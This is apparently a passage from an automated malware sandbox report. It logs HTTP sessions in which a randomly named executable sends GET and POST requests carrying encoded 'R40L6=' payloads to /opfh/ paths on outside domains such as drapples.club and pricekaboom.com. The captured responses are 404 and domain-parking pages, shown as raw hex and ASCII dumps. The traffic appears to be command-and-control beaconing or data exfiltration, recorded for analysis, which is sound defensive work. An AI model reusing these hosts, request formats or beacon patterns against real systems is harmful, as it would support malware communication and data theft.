75 44 58 75 4d 70 54 41 6e 6e 42 72 33 77 47 39 74 30 4c 4e 56 57 66 50 41 36 4e 35 43 77 6f 2f 33 4f 53 61 32 53 30 35 2b 30 53 4c 70 69 6e 64 6f 62 4c 5a 32 65 35 46 62 6c 2f 41 6e 49 79 [TRUNCATED]
                            Data Ascii: R40L6=v8Ty7FcsM7+oiESQ2AcdErLK+E8VlnQosC7YWAvaLclRHm/Jq8o+khn9pgozpyx3T2rsoAMVBybk3ONHa8zUGIQLWeJFIyYbxTXDfoNbb8TaL4p64p6KFS4EGd3UBJKeE/tMM6juLPCIuv7e9GeHVWKTNgqMPKz9YU17pSUf+BERMEiPw1R1eNjbWbvIsIwt9IhgK+Qa+NpUD0mZsQNWDAYmfHDnyn5nCumhcz3thBq4o6n+enpfmliuwAiYibUGL7vqsby2UbmoduDXuMpTAnnBr3wG9t0LNVWfPA6N5Cwo/3OSa2S05+0SLpindobLZ2e5Fbl/AnIy3L8jxuslIkHRkLAzFSoqZUVIqyXMXOH9AoChdm8pnOmUvJru0IStEPVqmkA1p7bC8Px3PWLpYf99GySivfXvhHRryGpOUWSbe/YQWMn6u89/BqFMVOxlSEUoy890/3RLqOZr3/wp/KMNBhkY472JKjNsJGdK0IGbasedbMQ7khkNkH72bcLg4Z42XfJIHQLEtzHbRdMeG6020O3zGLzWUg+CtIkOqhWuDSN1JtoTaLYVFf4g/EDIuFgHKY8ye53S4NqG/+9Gflcs/XGOrMsy2FLTC9ZDH9Y8c8a0kv+XigXmmmqZ7OJtTzgOItptylpTn54kZ7NwQVBIKurdFRk4qtbd3Uh6ZAYj3xF+zUVGW57Qi3c8kRkyfudrFi1ZSHLi9GCJN+svBZY+sWfp+/4Ii5ZtSKvrCly2PtGS7Ay4OjVu904wst4caJqX/6jWz55TCUjHGLt3wlyQj0jI+fcbykKHftqfOcp4RZJm88sSJZbuJClmtpKS+Iu222cu2isPvanFXGA2zTe95O2KDJFiUxZClS1M5YBTUrxPOomzoi9G5GYmVBPv/f+dyHDFukXZ/ej9aoFIDfYVxvh2gQVIv8CU1xrzh17RwVTk47AVT9MX3x3HPBQQ4FvfaIYigxgtgShBnNj1G9Aj0aAxda+ZYjZjWUfjknGkqQ [TRUNCATED]
                            May 27, 2024 12:22:44.754641056 CEST1236INHTTP/1.1 404 Not Found
                            date: Mon, 27 May 2024 10:22:44 GMT
                            server: Apache / ZoneOS
                            last-modified: Mon, 06 Nov 2023 23:06:18 GMT
                            etag: "1d7b-60983e6d29793"
                            accept-ranges: bytes
                            content-length: 7547
                            connection: close
                            content-type: text/html
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 44 [TRUNCATED]
                            Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="Content-Security-Policy" content="default-src 'unsafe-inline'"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title>404 Page Not Found</title><style>:root { --illustration-main-color: #D82E23 !important; }</style><style>.current-url { word-wrap: break-word; }</style><style type="text/css">:root { --main-text-color: #4E4E4E; --secondary-text-color: #959595; --illustration-main-color: #C3C3CC; --btn-border-radius: 0.25rem; --primary-btn-background: #C3C3CC; --primary-btn-color: #FCFCFC; --secondary-btn-background: #FCFCFC; --secondary-btn-color: #C3C3CC; --main-icon-color: #C3C3CC;}* { box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; line-height: 1.5;}html { height: 100%;}html, body { margin: 0;}body {
                            May 27, 2024 12:22:44.754662991 CEST1236INData Raw: 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 6d 69 6e 2d 68 65 69 67
                            Data Ascii: display: flex; flex-direction: column; padding-top: 100px; min-height: 100%; font-size: 16px; font-weight: 400; background-color: #FCFCFC;}.hidden { display: none;}.container, .hero { max-width: 78.125r
                            May 27, 2024 12:22:44.754678965 CEST1236INData Raw: 72 65 6e 74 3b 0a 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 6d 61 69 6e 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 72 65 6d
                            Data Ascii: rent; cursor: pointer; color: var(--main-text-color); margin-top: 5rem; display: flex;}.arrow-left { margin-right: 0.5rem; vertical-align: middle;}.arrow-left path { fill: var(--main-text-color);}.back-btn:
                            May 27, 2024 12:22:44.754692078 CEST672INData Raw: 20 76 61 72 28 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3b 0a 7d 0a 0a 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 7b 0a 20 20 20 20 2e 63 6f 6e 74 61
                            Data Ascii: var(--secondary-text-color);}@media screen and (min-width: 768px) { .container { width: 85%; } .hero { flex-direction: row; } #illustration { display: block; } .text-wrapper {
                            May 27, 2024 12:22:44.754704952 CEST1236INData Raw: 22 4d 31 39 20 31 30 2e 36 31 32 36 48 33 2e 33 34 32 35 36 4c 31 30 2e 38 36 34 37 20 31 38 2e 31 33 34 37 4c 39 2e 39 39 39 33 39 20 31 39 4c 31 20 31 30 2e 30 30 30 36 4c 31 30 2e 30 30 30 36 20 31 4c 31 30 2e 38 36 35 39 20 31 2e 38 36 35 33
                            Data Ascii: "M19 10.6126H3.34256L10.8647 18.1347L9.99939 19L1 10.0006L10.0006 1L10.8659 1.8653L3.34256 9.38866H19V10.6126Z" fill="black"/></svg> Tagasi</button><p class="auto-placed">Kesolev leht on siia automaatselt paigutatud Zone poolt.</p></div><div
                            May 27, 2024 12:22:44.754715919 CEST1236INData Raw: 20 63 6c 61 73 73 3d 22 62 61 63 6b 2d 62 74 6e 22 3e 3c 73 76 67 20 77 69 64 74 68 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 2d 6c 65 66 74 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32
                            Data Ascii: class="back-btn"><svg width="20" height="20" class="arrow-left" viewBox="0 0 20 20" xmlns="http://www.w3.org/2000/svg"><path d="M19 10.6126H3.34256L10.8647 18.1347L9.99939 19L1 10.0006L10.0006 1L10.8659 1.8653L3.34256 9.38866H19V10.6126Z" fil
                            May 27, 2024 12:22:44.754740953 CEST945INData Raw: 72 69 6e 67 28 30 2c 32 29 2c 63 3d 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2c 6c 3d 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 73 70 6c 69 74 28 22 2f 22 29 2e 73 6c 69 63 65 28 2d 31 29 3b 6c 3d 6c 5b 30 5d 2e 73 70 6c 69 74 28 22 2e
                            Data Ascii: ring(0,2),c=location.hostname,l=location.href.split("/").slice(-1);l=l[0].split(".").slice(1,-1).join("."),"et"===n?e.forEach((e=>{e.classList.remove("hidden")})):"ru"===n?t.forEach((e=>{e.classList.remove("hidden")})):"fi"===n?r.forEach((e=>{


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            40192.168.2.763201185.31.240.240802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:22:46.698255062 CEST459OUTGET /opfh/?R40L6=i+7S41wOBsHRtkSR5z49LNLl1g14jCJSsH67VhPHZINUfWrbgsYvxB6MwE8qgxdKQETWoz01bCGz4LwvUs/3BJoUBrhuAwUbkATTebp7Ts+JQM1y8oWpV0wDLMDnSIORGtRyV6PjEdP1&b2PX=hZXl7VFPKl04 HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Host: www.pricekaboom.com
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            May 27, 2024 12:22:47.358438015 CEST1236INHTTP/1.1 404 Not Found
                            date: Mon, 27 May 2024 10:22:47 GMT
                            server: Apache / ZoneOS
                            last-modified: Mon, 06 Nov 2023 23:06:18 GMT
                            etag: "1d7b-60983e6d29793"
                            accept-ranges: bytes
                            content-length: 7547
                            connection: close
                            content-type: text/html
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 44 [TRUNCATED]
                            Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="Content-Security-Policy" content="default-src 'unsafe-inline'"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title>404 Page Not Found</title><style>:root { --illustration-main-color: #D82E23 !important; }</style><style>.current-url { word-wrap: break-word; }</style><style type="text/css">:root { --main-text-color: #4E4E4E; --secondary-text-color: #959595; --illustration-main-color: #C3C3CC; --btn-border-radius: 0.25rem; --primary-btn-background: #C3C3CC; --primary-btn-color: #FCFCFC; --secondary-btn-background: #FCFCFC; --secondary-btn-color: #C3C3CC; --main-icon-color: #C3C3CC;}* { box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; line-height: 1.5;}html { height: 100%;}html, body { margin: 0;}body {
                            May 27, 2024 12:22:47.358457088 CEST224INData Raw: 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 6d 69 6e 2d 68 65 69 67
                            Data Ascii: display: flex; flex-direction: column; padding-top: 100px; min-height: 100%; font-size: 16px; font-weight: 400; background-color: #FCFCFC;}.hidden { display: none;}.container, .hero {
                            May 27, 2024 12:22:47.358541012 CEST1236INData Raw: 20 6d 61 78 2d 77 69 64 74 68 3a 20 37 38 2e 31 32 35 72 65 6d 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 39 30 25 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 61 6c 69
                            Data Ascii: max-width: 78.125rem;}.container { width: 90%; margin: 0 auto; align-self: center;}.hero { display: flex; justify-content: space-between; align-self: center; min-height: 37.5rem; width: 100%; flex-di
                            May 27, 2024 12:22:47.358587027 CEST1236INData Raw: 6c 6f 72 29 3b 0a 7d 0a 0a 2e 62 61 63 6b 2d 62 74 6e 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3b 0a 7d 0a 0a 2e 62 61 63 6b 2d 62 74 6e 3a 68 6f
                            Data Ascii: lor);}.back-btn:hover { color: var(--secondary-text-color);}.back-btn:hover .arrow-left path { fill: var(--secondary-text-color);}.button { padding: 0; margin: 0 1rem 0 0; border: none; border-radius: var(--btn
                            May 27, 2024 12:22:47.358602047 CEST1236INData Raw: 2d 77 72 61 70 70 65 72 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 20 20 20 20 7d 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69
                            Data Ascii: -wrapper { width: 50%; }}</style></head><body><section class="container"><div class="content-et hidden"><h1 class="error-code">404</h1><h3 class="title">Lehte ei leitud</h3><p class="desc">Lehte <strong><span class="current-url">
                            May 27, 2024 12:22:47.358644962 CEST1236INData Raw: 56 31 30 2e 36 31 32 36 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 3c 2f 73 76 67 3e 20 54 61 67 61 73 69 3c 2f 62 75 74 74 6f 6e 3e 3c 70 20 63 6c 61 73 73 3d 22 61 75 74 6f 2d 70 6c 61 63 65 64 22 3e d0 ad d1 82 d0 b0 20 d1 81 d1 82 d1
                            Data Ascii: V10.6126Z" fill="black"/></svg> Tagasi</button><p class="auto-placed"> Zone .</p></div><div class="content-fi hidden"><h1 class="error-code">404
                            May 27, 2024 12:22:47.358683109 CEST1236INData Raw: 39 20 31 39 4c 31 20 31 30 2e 30 30 30 36 4c 31 30 2e 30 30 30 36 20 31 4c 31 30 2e 38 36 35 39 20 31 2e 38 36 35 33 4c 33 2e 33 34 32 35 36 20 39 2e 33 38 38 36 36 48 31 39 56 31 30 2e 36 31 32 36 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f
                            Data Ascii: 9 19L1 10.0006L10.0006 1L10.8659 1.8653L3.34256 9.38866H19V10.6126Z" fill="black"/></svg> Go Back</button><p class="auto-placed">This page is placed here automatically by Zone.</p></div></section><script defer="defer">(()=>{var e={225:()=>{con
                            May 27, 2024 12:22:47.358691931 CEST157INData Raw: 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6f 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 74 5b 6f 5d 7d 29 7d 2c 72 2e 6f 3d 28 65 2c 74 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50
                            Data Ascii: .defineProperty(e,o,{enumerable:!0,get:t[o]})},r.o=(e,t)=>Object.prototype.hasOwnProperty.call(e,t),(()=>{"use strict";r(225)})()})();</script></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            41192.168.2.763202199.59.243.225802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:22:52.490180969 CEST714OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.drapples.club
                            Origin: http://www.drapples.club
                            Referer: http://www.drapples.club/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 218
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 46 76 4b 32 4e 41 54 77 53 69 46 4e 55 39 70 73 62 45 53 4b 41 57 36 6a 43 65 54 6e 51 31 37 64 35 31 50 61 5a 39 37 48 65 73 52 67 4d 72 6f 65 2f 62 70 6c 69 39 62 38 79 51 36 30 46 56 39 56 63 54 4e 53 6e 39 30 62 55 48 59 62 6c 68 43 66 41 51 6d 6c 36 50 33 44 33 37 75 52 49 69 72 71 6b 48 66 6c 52 38 4e 6e 46 50 2b 76 35 6e 42 69 66 6e 2b 63 6a 6c 64 58 41 6d 74 69 56 7a 36 59 78 54 47 52 71 42 4d 49 76 4b 46 57 69 4a 2f 54 6e 2f 75 7a 35 64 73 78 65 6e 66 38 35 39 31 58 57 74 73 4c 6b 51 34 48 50 43 38 54 6c 79 49 38 42 57 72 79 55 61 65 63 53 51 78 61 39 66 4a 56 4b 39 64 32 4d 47 6e 39 30 6c 76 73 4e 45 77 56 49 41 3d 3d
                            Data Ascii: R40L6=FvK2NATwSiFNU9psbESKAW6jCeTnQ17d51PaZ97HesRgMroe/bpli9b8yQ60FV9VcTNSn90bUHYblhCfAQml6P3D37uRIirqkHflR8NnFP+v5nBifn+cjldXAmtiVz6YxTGRqBMIvKFWiJ/Tn/uz5dsxenf8591XWtsLkQ4HPC8TlyI8BWryUaecSQxa9fJVK9d2MGn90lvsNEwVIA==
                            May 27, 2024 12:22:52.945401907 CEST1236INHTTP/1.1 200 OK
                            date: Mon, 27 May 2024 10:22:52 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 1118
                            x-request-id: 87b641e3-cfbc-4fe6-8cf8-8139caefe5e3
                            cache-control: no-store, max-age=0
                            accept-ch: sec-ch-prefers-color-scheme
                            critical-ch: sec-ch-prefers-color-scheme
                            vary: sec-ch-prefers-color-scheme
                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_h81eJFbn4TlnvX499eJj8fuzpnXsJ6dgkOVB+OPiMDN1v5mGD8xX/ZWCT+qDOPZ635PD18fBwmoOxl+gTjtqpQ==
                            set-cookie: parking_session=87b641e3-cfbc-4fe6-8cf8-8139caefe5e3; expires=Mon, 27 May 2024 10:37:52 GMT; path=/
                            connection: close
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 68 38 31 65 4a 46 62 6e 34 54 6c 6e 76 58 34 39 39 65 4a 6a 38 66 75 7a 70 6e 58 73 4a 36 64 67 6b 4f 56 42 2b 4f 50 69 4d 44 4e 31 76 35 6d 47 44 38 78 58 2f 5a 57 43 54 2b 71 44 4f 50 5a 36 33 35 50 44 31 38 66 42 77 6d 6f 4f 78 6c 2b 67 54 6a 74 71 70 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_h81eJFbn4TlnvX499eJj8fuzpnXsJ6dgkOVB+OPiMDN1v5mGD8xX/ZWCT+qDOPZ635PD18fBwmoOxl+gTjtqpQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                            May 27, 2024 12:22:52.945430040 CEST571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODdiNjQxZTMtY2ZiYy00ZmU2LThjZjgtODEzOWNhZWZlNWUzIiwicGFnZV90aW1lIjoxNzE2ODA1Mz


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            42192.168.2.763203199.59.243.225802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:22:55.019215107 CEST734OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.drapples.club
                            Origin: http://www.drapples.club
                            Referer: http://www.drapples.club/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 238
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 46 76 4b 32 4e 41 54 77 53 69 46 4e 56 64 35 73 57 48 36 4b 56 47 36 38 65 4f 54 6e 61 56 37 42 35 31 44 61 5a 38 2f 58 64 66 35 67 4e 4a 77 65 74 4b 70 6c 6a 39 62 38 6d 67 36 78 61 46 39 53 63 54 49 74 6e 35 77 62 55 44 49 62 6c 67 79 66 48 6a 65 69 37 66 33 42 38 62 75 54 46 43 72 71 6b 48 66 6c 52 38 4a 42 46 50 6d 76 35 55 70 69 65 43 4b 66 39 56 64 49 4b 47 74 69 66 54 36 63 78 54 47 4a 71 45 55 75 76 49 4e 57 69 49 50 54 6e 74 57 30 33 64 73 37 54 48 65 4d 2b 59 55 68 63 76 45 59 6d 44 67 35 4a 44 41 4d 74 6b 56 65 62 30 6e 65 4b 4c 6d 6e 57 53 56 73 71 35 55 67 49 38 5a 75 42 6b 54 63 72 53 4b 47 41 57 52 52 65 2f 2f 76 62 64 4a 4d 31 30 48 32 4f 55 56 4a 74 35 44 57 6a 47 45 3d
                            Data Ascii: R40L6=FvK2NATwSiFNVd5sWH6KVG68eOTnaV7B51DaZ8/Xdf5gNJwetKplj9b8mg6xaF9ScTItn5wbUDIblgyfHjei7f3B8buTFCrqkHflR8JBFPmv5UpieCKf9VdIKGtifT6cxTGJqEUuvINWiIPTntW03ds7THeM+YUhcvEYmDg5JDAMtkVeb0neKLmnWSVsq5UgI8ZuBkTcrSKGAWRRe//vbdJM10H2OUVJt5DWjGE=
                            May 27, 2024 12:22:55.479209900 CEST1236INHTTP/1.1 200 OK
                            date: Mon, 27 May 2024 10:22:55 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 1118
                            x-request-id: 3699ca2b-907c-4555-a6ff-b5b7b7d84c7d
                            cache-control: no-store, max-age=0
                            accept-ch: sec-ch-prefers-color-scheme
                            critical-ch: sec-ch-prefers-color-scheme
                            vary: sec-ch-prefers-color-scheme
                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_h81eJFbn4TlnvX499eJj8fuzpnXsJ6dgkOVB+OPiMDN1v5mGD8xX/ZWCT+qDOPZ635PD18fBwmoOxl+gTjtqpQ==
                            set-cookie: parking_session=3699ca2b-907c-4555-a6ff-b5b7b7d84c7d; expires=Mon, 27 May 2024 10:37:55 GMT; path=/
                            connection: close
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 68 38 31 65 4a 46 62 6e 34 54 6c 6e 76 58 34 39 39 65 4a 6a 38 66 75 7a 70 6e 58 73 4a 36 64 67 6b 4f 56 42 2b 4f 50 69 4d 44 4e 31 76 35 6d 47 44 38 78 58 2f 5a 57 43 54 2b 71 44 4f 50 5a 36 33 35 50 44 31 38 66 42 77 6d 6f 4f 78 6c 2b 67 54 6a 74 71 70 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_h81eJFbn4TlnvX499eJj8fuzpnXsJ6dgkOVB+OPiMDN1v5mGD8xX/ZWCT+qDOPZ635PD18fBwmoOxl+gTjtqpQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
